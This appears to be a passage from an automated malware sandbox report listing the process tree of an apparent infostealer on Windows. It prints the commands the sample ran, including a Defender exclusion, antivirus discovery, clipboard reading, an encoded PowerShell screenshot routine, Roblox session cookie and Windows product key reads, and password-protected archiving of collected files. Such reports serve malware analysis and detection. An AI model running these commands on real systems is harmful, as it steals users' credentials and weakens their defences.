        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2872
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5044
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:1900
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:3420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:1012
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:2384
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:3608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:956
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4560
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:3596
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:2232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3280
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:392
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1652
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1828
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:3028
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:2508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:3844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2204
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z40vssz2\z40vssz2.cmdline"
        6⤵
        
        PID:5052
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD23A.tmp" "c:\Users\Admin\AppData\Local\Temp\z40vssz2\CSCB95D244F528744D0B0B913213025716B.TMP"
        7⤵
        
        PID:3224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4528
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:412
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4776
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:4376
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:2076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3068
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3308
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2512
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1204"
      4⤵
      PID:4452
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2076
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1204
        5⤵
        Kills process with taskkill
        
        PID:4596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1204"
      4⤵
      PID:3028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1204
        5⤵
        Kills process with taskkill
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4700"
      4⤵
      PID:436
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4700
        5⤵
        Kills process with taskkill
        
        PID:3308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4700"
      4⤵
      PID:3772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4700
        5⤵
        Kills process with taskkill
        
        PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 384"
      4⤵
      PID:4940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 384
        5⤵
        Kills process with taskkill
        
        PID:2512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 384"
      4⤵
      PID:4516
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1512
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 384
        5⤵
        Kills process with taskkill
        
        PID:2204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1576"
      4⤵
      PID:4928
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3844
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1576
        5⤵
        Kills process with taskkill
        
        PID:3444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1576"
      4⤵
      PID:3196
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1576
        5⤵
        Kills process with taskkill
        
        PID:4068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1020"
      4⤵
      PID:3632
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1020
        5⤵
        Kills process with taskkill
        
        PID:1104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1020"
      4⤵
      PID:3700
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1020
        5⤵
        Kills process with taskkill
        
        PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3040"
      4⤵
      PID:4812
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3040
        5⤵
        Kills process with taskkill
        
        PID:4560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3040"
      4⤵
      PID:916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3040
        5⤵
        Kills process with taskkill
        
        PID:1144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2528"
      4⤵
      PID:3068
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2528
        5⤵
        Kills process with taskkill
        
        PID:2056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2528"
      4⤵
      PID:1076
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2528
        5⤵
        Kills process with taskkill
        
        PID:3028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5008
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4420
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36042\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\y3uj0.zip" *"
      4⤵
      PID:2032
    - - C:\Users\Admin\AppData\Local\Temp\_MEI36042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI36042\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\y3uj0.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:1104
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2952
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1996
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:404
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4596
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1892

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
